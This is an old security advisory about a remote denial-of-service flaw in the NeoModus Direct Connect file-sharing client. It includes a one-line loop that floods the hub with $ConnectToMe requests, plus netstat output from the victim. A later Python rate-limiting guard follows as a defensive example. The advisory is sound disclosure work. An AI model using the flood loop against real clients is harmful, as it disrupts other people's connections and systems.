
NeoModus Direct Connect 1.0 build 9 Remote DoS FSC:




     sec-labs team proudly presents:
     
     Remote DoS vulnerability in NeoModus Direct Connect 1.0 build 9
     and probably the newest version.
     by Lord YuP
     13/07/2003



   I. BACKGROUND

     Direct Connect is a Windows (I've also found a Linux version, but
     I don't have time to test it) p2p file-sharing program, quite
     common nowadays.


   II. DESCRIPTION


     According to aDe, the DC client-to-client handshake looks like:

     	Client <-> Client Communication in DC. 11-05-2002. By aDe 
	---------------------------------------------------------- 

	ACTIVE FILE DOWNLOAD 
	---------------------- 
	D = downloader 
	U = uploader 
	H = hub 

	D>H: $ConnectToMe <U's username> <D's IP and port>|
	H>U: $ConnectToMe <U's username> <D's IP and port>|

	...bla bla ... ;)


     As you can guess, after receiving the "$ConnectToMe..." command
     from the hub, the Direct Connect client tries to connect to the
     specific IP and port sent by the downloader.

     The attacker (evil downloader) can send an endless stream of
     requests to the hub, each with a specific chosen ip:port, causing
     a DoS in the victim's client.

     A small example:
     
     Attacker: for (;;) { dc_send("$ConnectToMe victim www.microsoft.com:%d",sample_port++); }

     Client (output of "netstat -a"):
     

	  TCP    jin:1993               JIN:0                  LISTENING
	  TCP    jin:1995               JIN:0                  LISTENING
	  TCP    jin:1996               JIN:0                  LISTENING
	  TCP    jin:2005               JIN:0                  LISTENING
	  TCP    jin:2006               JIN:0                  LISTENING
	  TCP    jin:2007               JIN:0                  LISTENING
	  TCP    jin:2008               JIN:0                  LISTENING
	  TCP    jin:2009               JIN:0                  LISTENING
	  TCP    jin:2010               JIN:0                  LISTENING
	  TCP    jin:2011               JIN:0                  LISTENING
	  TCP    jin:2012               JIN:0                  LISTENING
	  TCP    jin:2013               JIN:0                  LISTENING
	  TCP    jin:2014               JIN:0                  LISTENING
	  TCP    jin:2015               JIN:0                  LISTENING
	  TCP    jin:2016               JIN:0                  LISTENING
	  TCP    jin:2017               JIN:0                  LISTENING
	  TCP    jin:2018               JIN:0                  LISTENING
	  TCP    jin:2019               JIN:0                  LISTENING
	  ...and so on...


   III. IMPACT

     The attacked client may be DoS-ed: the internet connection can be
     reset/stopped, some clients may be flooded with "Out of Memory"
     message boxes, in which case the system may not work correctly,
     and the DC client may be terminated.



-- 
sec-labs team [http://sec-labs.hack.pl]
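
One way a client could bound the behaviour described above, shown as an added example (not code from the advisory or from NeoModus). The class name, limits and the 192.0.2.10 sample host are assumptions; the command format follows the aDe excerpt quoted in the description.

```python
import re
import time
from collections import deque

# Constructed from the command format quoted above: $ConnectToMe <nick> <host>:<port>|
CONNECT_RE = re.compile(r"^\$ConnectToMe (\S+) ([^\s:|]+):(\d{1,5})\|$")

class ConnectToMeGuard:
    """Client-side gate: may this hub-relayed $ConnectToMe open a connection?"""

    def __init__(self, my_nick, max_per_window=5, window=10.0, max_pending=8,
                 clock=time.monotonic):
        self.my_nick, self.clock = my_nick, clock
        self.max_per_window, self.window = max_per_window, window
        self.max_pending = max_pending
        self.recent = deque()  # timestamps of accepted requests
        self.pending = set()   # (host, port) attempts still open

    def check(self, raw):
        m = CONNECT_RE.match(raw)
        if not m:
            return "drop: malformed"
        nick, host, port = m.group(1), m.group(2), int(m.group(3))
        if nick != self.my_nick:
            return "drop: not addressed to us"
        if not 1 <= port <= 65535:
            return "drop: bad port"
        now = self.clock()
        while self.recent and now - self.recent[0] > self.window:
            self.recent.popleft()  # forget requests outside the window
        if len(self.recent) >= self.max_per_window:
            return "drop: rate limit"
        if len(self.pending) >= self.max_pending or (host, port) in self.pending:
            return "drop: pending limit"
        self.recent.append(now)
        self.pending.add((host, port))
        return "connect"

    def finished(self, host, port):
        """Call when the outbound attempt succeeds, fails or times out."""
        self.pending.discard((host, port))

def simulate_flood(guard, count, host="192.0.2.10", start_port=2000):
    """Constructed input: one command per port, like the flood described above."""
    return [guard.check(f"$ConnectToMe {guard.my_nick} {host}:{start_port + i}|")
            for i in range(count)]

if __name__ == "__main__":
    print(simulate_flood(ConnectToMeGuard("victim"), 20))
```

The rate window bounds how fast new sockets are opened, and the pending cap bounds how many can exist at once even when the requests arrive slowly.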


